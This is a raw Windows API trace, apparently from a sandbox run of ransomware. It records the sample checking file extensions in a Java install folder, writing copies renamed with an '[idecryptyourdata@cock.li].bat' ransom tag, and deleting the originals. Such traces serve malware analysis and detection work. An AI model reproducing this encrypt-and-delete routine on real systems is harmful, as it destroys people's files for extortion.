[0199.725] lstrlenW (lpString=".bz2") returned 4 [0199.725] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0199.725] lstrlenW (lpString=".7z") returned 3 [0199.725] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0199.725] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll") returned 46 [0199.725] lstrlenW (lpString=".dbf") returned 4 [0199.725] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0199.725] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll") returned 46 [0199.725] lstrlenW (lpString=".1cd") returned 4 [0199.725] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0199.725] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll") returned 46 [0199.725] lstrlenW (lpString=".jpg") returned 4 [0199.725] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0199.725] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0199.725] lstrlenW (lpString="sunmscapi.dll") returned 13 [0199.725] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunmscapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0199.726] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=31808) returned 1 [0199.726] CloseHandle (hObject=0x3a8) returned 1 [0199.726] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunmscapi.dll")) returned 0x20 [0199.726] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunmscapi.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0199.726] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunmscapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0199.726] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.726] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.726] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunmscapi.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0199.727] GetLastError () returned 0x0 [0199.727] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x7c40, lpOverlapped=0x0) returned 1 [0199.809] WriteFile (in: hFile=0x35c, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x7c50, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x7c50, lpOverlapped=0x0) returned 1 [0199.811] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.811] WriteFile (in: hFile=0x35c, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xee, lpOverlapped=0x0) returned 1 [0199.811] SetEndOfFile (hFile=0x35c) returned 1 [0199.811] CloseHandle (hObject=0x35c) returned 1 [0199.811] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.811] SetEndOfFile (hFile=0x3a8) returned 1 [0199.812] CloseHandle (hObject=0x3a8) returned 1 [0199.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0199.812] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunmscapi.dll")) returned 1 [0199.813] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll") returned 52 [0199.813] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll") returned 52 [0199.813] lstrlenW (lpString=".doc") returned 4 [0199.813] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0199.813] lstrlenW (lpString=".docx") returned 5 [0199.813] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0199.813] lstrlenW (lpString=".pdf") returned 4 [0199.813] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0199.813] lstrlenW (lpString=".xls") returned 4 [0199.813] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0199.813] lstrlenW (lpString=".xlsx") returned 5 [0199.813] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0199.813] lstrlenW (lpString=".ppt") returned 4 [0199.813] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0199.813] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll") returned 52 [0199.813] lstrlenW (lpString=".zip") returned 4 [0199.813] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0199.813] lstrlenW (lpString=".rar") returned 4 [0199.813] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0199.813] lstrlenW (lpString=".bz2") returned 4 [0199.813] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0199.813] lstrlenW (lpString=".7z") returned 3 [0199.813] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0199.813] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll") returned 52 [0199.813] lstrlenW (lpString=".dbf") returned 4 [0199.813] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0199.813] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll") returned 52 [0199.813] lstrlenW (lpString=".1cd") returned 4 [0199.813] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0199.813] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll") returned 52 [0199.814] lstrlenW (lpString=".jpg") returned 4 [0199.814] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0199.814] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll") returned 52 [0199.814] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll") returned 52 [0199.814] lstrlenW (lpString=".doc") returned 4 [0199.814] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0199.814] lstrlenW (lpString=".docx") returned 5 [0199.814] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0199.814] lstrlenW (lpString=".pdf") returned 4 [0199.814] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0199.814] lstrlenW (lpString=".xls") returned 4 [0199.814] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0199.814] lstrlenW (lpString=".xlsx") returned 5 [0199.814] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0199.814] lstrlenW (lpString=".ppt") returned 4 [0199.814] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0199.814] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll") returned 52 [0199.814] lstrlenW (lpString=".zip") returned 4 [0199.814] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0199.814] lstrlenW (lpString=".rar") returned 4 [0199.814] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0199.814] lstrlenW (lpString=".bz2") returned 4 [0199.814] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0199.814] lstrlenW (lpString=".7z") returned 3 [0199.814] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0199.814] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll") returned 52 [0199.814] lstrlenW (lpString=".dbf") returned 4 [0199.814] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0199.814] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll") returned 52 [0199.814] lstrlenW (lpString=".1cd") returned 4 [0199.814] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0199.814] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll") returned 52 [0199.815] lstrlenW (lpString=".jpg") returned 4 [0199.815] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0199.815] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0199.815] lstrlenW (lpString="t2k.dll") returned 7 [0199.815] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\t2k.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0199.815] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=255040) returned 1 [0199.815] CloseHandle (hObject=0x3a8) returned 1 [0199.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\t2k.dll")) returned 0x20 [0199.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\t2k.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0199.815] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\t2k.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0199.816] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.816] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.816] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\t2k.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0199.816] GetLastError () returned 0x0 [0199.816] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x3e440, lpOverlapped=0x0) returned 1 [0199.937] WriteFile (in: hFile=0x35c, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x3e450, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x3e450, lpOverlapped=0x0) returned 1 [0199.941] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.941] WriteFile (in: hFile=0x35c, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xe2, lpOverlapped=0x0) returned 1 [0199.941] SetEndOfFile (hFile=0x35c) returned 1 [0199.941] CloseHandle (hObject=0x35c) returned 1 [0199.941] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.941] SetEndOfFile (hFile=0x3a8) returned 1 [0199.943] CloseHandle (hObject=0x3a8) returned 1 [0199.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0199.943] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\t2k.dll")) returned 1 [0199.944] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll") returned 46 [0199.944] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll") returned 46 [0199.944] lstrlenW (lpString=".doc") returned 4 [0199.944] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0199.944] lstrlenW (lpString=".docx") returned 5 [0199.944] lstrcmpiW (lpString1=".docx", lpString2="k.dll") returned -1 [0199.944] lstrlenW (lpString=".pdf") returned 4 [0199.944] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0199.944] lstrlenW (lpString=".xls") returned 4 [0199.944] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0199.944] lstrlenW (lpString=".xlsx") returned 5 [0199.944] lstrcmpiW (lpString1=".xlsx", lpString2="k.dll") returned -1 [0199.944] lstrlenW (lpString=".ppt") returned 4 [0199.944] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0199.944] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll") returned 46 [0199.944] lstrlenW (lpString=".zip") returned 4 [0199.944] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0199.944] lstrlenW (lpString=".rar") returned 4 [0199.944] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0199.944] lstrlenW (lpString=".bz2") returned 4 [0199.974] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0199.974] lstrlenW (lpString=".7z") returned 3 [0199.974] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0199.974] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll") returned 46 [0199.974] lstrlenW (lpString=".dbf") returned 4 [0199.974] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0199.974] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll") returned 46 [0199.974] lstrlenW (lpString=".1cd") returned 4 [0199.974] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0199.974] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll") returned 46 [0199.974] lstrlenW (lpString=".jpg") returned 4 [0199.974] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0199.974] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll") returned 46 [0199.974] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll") returned 46 [0199.974] lstrlenW (lpString=".doc") returned 4 [0199.974] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0199.974] lstrlenW (lpString=".docx") returned 5 [0199.974] lstrcmpiW (lpString1=".docx", lpString2="k.dll") returned -1 [0199.974] lstrlenW (lpString=".pdf") returned 4 [0199.974] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0199.974] lstrlenW (lpString=".xls") returned 4 [0199.975] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0199.975] lstrlenW (lpString=".xlsx") returned 5 [0199.975] lstrcmpiW (lpString1=".xlsx", lpString2="k.dll") returned -1 [0199.975] lstrlenW (lpString=".ppt") returned 4 [0199.975] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0199.975] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll") returned 46 [0199.975] lstrlenW (lpString=".zip") returned 4 [0199.975] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0199.975] lstrlenW (lpString=".rar") returned 4 [0199.975] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0199.975] lstrlenW (lpString=".bz2") returned 4 [0199.975] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0199.975] lstrlenW (lpString=".7z") returned 3 [0199.975] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0199.975] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll") returned 46 [0199.975] lstrlenW (lpString=".dbf") returned 4 [0199.975] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0199.975] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll") returned 46 [0199.975] lstrlenW (lpString=".1cd") returned 4 [0199.975] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0199.975] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll") returned 46 [0199.975] lstrlenW (lpString=".jpg") returned 4 [0199.975] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0199.975] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0199.975] lstrlenW (lpString="tnameserv.exe") returned 13 [0199.975] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\tnameserv.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0199.976] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=16448) returned 1 [0199.976] CloseHandle (hObject=0x3a8) returned 1 [0199.976] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\tnameserv.exe")) returned 0x20 [0199.976] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\tnameserv.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0199.976] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\tnameserv.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0199.976] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.976] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.976] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\tnameserv.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0200.461] GetLastError () returned 0x0 [0200.461] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x4040, lpOverlapped=0x0) returned 1 [0200.620] WriteFile (in: hFile=0x364, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x4050, lpOverlapped=0x0) returned 1 [0200.621] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0200.621] WriteFile (in: hFile=0x364, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xee, lpOverlapped=0x0) returned 1 [0200.622] SetEndOfFile (hFile=0x364) returned 1 [0200.622] CloseHandle (hObject=0x364) returned 1 [0200.622] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.622] SetEndOfFile (hFile=0x3a8) returned 1 [0200.623] CloseHandle (hObject=0x3a8) returned 1 [0200.623] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0200.623] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\tnameserv.exe")) returned 1 [0200.623] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe") returned 52 [0200.623] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe") returned 52 [0200.623] lstrlenW (lpString=".doc") returned 4 [0200.623] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0200.623] lstrlenW (lpString=".docx") returned 5 [0200.623] lstrcmpiW (lpString1=".docx", lpString2="v.exe") returned -1 [0200.623] lstrlenW (lpString=".pdf") returned 4 [0200.623] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0200.623] lstrlenW (lpString=".xls") returned 4 [0200.623] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0200.623] lstrlenW (lpString=".xlsx") returned 5 [0200.623] lstrcmpiW (lpString1=".xlsx", lpString2="v.exe") returned -1 [0200.623] lstrlenW (lpString=".ppt") returned 4 [0200.623] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0200.623] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe") returned 52 [0200.623] lstrlenW (lpString=".zip") returned 4 [0200.623] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0200.623] lstrlenW (lpString=".rar") returned 4 [0200.624] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0200.624] lstrlenW (lpString=".bz2") returned 4 [0200.624] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0200.624] lstrlenW (lpString=".7z") returned 3 [0200.624] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0200.624] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe") returned 52 [0200.624] lstrlenW (lpString=".dbf") returned 4 [0200.624] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0200.624] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe") returned 52 [0200.624] lstrlenW (lpString=".1cd") returned 4 [0200.624] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0200.624] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe") returned 52 [0200.624] lstrlenW (lpString=".jpg") returned 4 [0200.624] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0200.624] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe") returned 52 [0200.624] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe") returned 52 [0200.624] lstrlenW (lpString=".doc") returned 4 [0200.624] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0200.624] lstrlenW (lpString=".docx") returned 5 [0200.624] lstrcmpiW (lpString1=".docx", lpString2="v.exe") returned -1 [0200.624] lstrlenW (lpString=".pdf") returned 4 [0200.624] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0200.624] lstrlenW (lpString=".xls") returned 4 [0200.624] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0200.624] lstrlenW (lpString=".xlsx") returned 5 [0200.624] lstrcmpiW (lpString1=".xlsx", lpString2="v.exe") returned -1 [0200.624] lstrlenW (lpString=".ppt") returned 4 [0200.624] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0200.624] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe") returned 52 [0200.624] lstrlenW (lpString=".zip") returned 4 [0200.624] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0200.624] lstrlenW (lpString=".rar") returned 4 [0200.624] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0200.624] lstrlenW (lpString=".bz2") returned 4 [0200.624] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0200.624] lstrlenW (lpString=".7z") returned 3 [0200.624] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0200.625] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe") returned 52 [0200.625] lstrlenW (lpString=".dbf") returned 4 [0200.625] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0200.625] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe") returned 52 [0200.625] lstrlenW (lpString=".1cd") returned 4 [0200.625] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0200.625] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe") returned 52 [0200.625] lstrlenW (lpString=".jpg") returned 4 [0200.625] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0200.625] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0200.625] lstrlenW (lpString="wsdetect.dll") returned 12 [0200.625] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\wsdetect.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0200.627] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=192576) returned 1 [0200.627] CloseHandle (hObject=0x3a8) returned 1 